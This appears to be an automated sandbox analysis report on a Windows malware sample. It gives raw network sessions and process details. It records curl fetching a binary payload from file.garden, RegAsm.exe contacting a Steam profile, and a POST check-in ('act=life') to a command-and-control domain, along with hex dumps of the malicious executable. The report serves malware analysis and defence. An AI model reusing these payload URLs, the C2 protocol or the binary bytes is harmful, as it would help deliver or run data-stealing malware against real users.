2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 8b Data Ascii: @Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 00 c6 83 dd 6c 00 Data Ascii: !$auEktEkE(3PQx"EP!\|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjDl
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b e2 00 00 8b 4d 58 Data Ascii: F"3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPKMX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	188.114.96.3	443	2976	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:25:31 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:25:31 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:25:31 GMT Content-Type: application/octet-stream Content-Length: 370176 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Sun, 22 Sep 2024 19:01:04 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 681774 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wsOdPF1wPUSzDq5NvRB7tOyw816kyMBQO3P3fc7wM%2Fed4QJb6Kg3%2B8YLfUCBkN8Oal%2Bt5tkuK5ojyjuqdhCoPDzLWJxuTS5RVTMiBKuMscZ508aCLN34ejPMe4zU0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb591c5aa1f4295-EWR
2024-09-30 16:25:31 UTC	555	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 b2 3f Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ\|m&.y;KR7Skm?8ID&!0%N!\\L^0\j\|MM;qUO!'%. dEuQ-w$IX0df$\|(gEN3JT?
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 d2 f4 Data Ascii: 2[5CX",_:k$J48Q3e,\|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%8
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 b0 74 Data Ascii: }> :?mQEB_\|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~ct
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da f3 d4 Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d 05 a2 Data Ascii: GB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 c2 9d Data Ascii: 3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f 04 98 Data Ascii: gxJfS{~ZsN\pVw`d[rcEDb=B\|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA\|yUsmje\|\<_td $}d4Nl6*fc_
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 70 24 Data Ascii: A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<:eyy}VTZZ=,$Gz\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~ep$
2024-09-30 16:25:31 UTC	1369	IN	Data Raw: e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 f6 31 Data Ascii: .h!L3y8s6}.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</\|L\|[2}cr"DeN)vv_eH4jnm$WS_k5c:TiNSRjX*'TD\|K{31

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	104.102.49.254	443	5012	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:25:34 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-30 16:25:35 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 30 Sep 2024 16:25:35 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=454e6150a430a2bb1e41ed62; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-30 16:25:35 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-30 16:25:35 UTC	16384	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
2024-09-30 16:25:35 UTC	3768	IN	Data Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
2024-09-30 16:25:35 UTC	12	IN	Data Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: dy></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	104.21.84.213	443	5012	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:25:36 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offeviablwke.site
2024-09-30 16:25:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-30 16:25:36 UTC	778	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:25:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ftj8h3bogh6fl4f1200m33os1u; expires=Fri, 24 Jan 2025 10:12:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2F0Hw7gmq1CETxGAoIQWq6YQvDXyRWNVcf2IfhTZA9ImKd9XKBQkYdhvPqKeL3MbH9%2FjnNyK52KgZQB%2Bemz3IQhouFYJG1a%2FyGPxjEVgZ5Y7r84GgIv3n3%2FZ0Bz3YQWA49xoGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb591e179fe420a-EWR
2024-09-30 16:25:36 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-30 16:25:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:25:22
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\4tXm5yPtiy.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\4tXm5yPtiy.exe"
Imagebase:	0x7ff68b480000
File size:	628'224 bytes
MD5 hash:	CC9824F9940392C9172E05078982CAAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:25:22
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:25:27
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
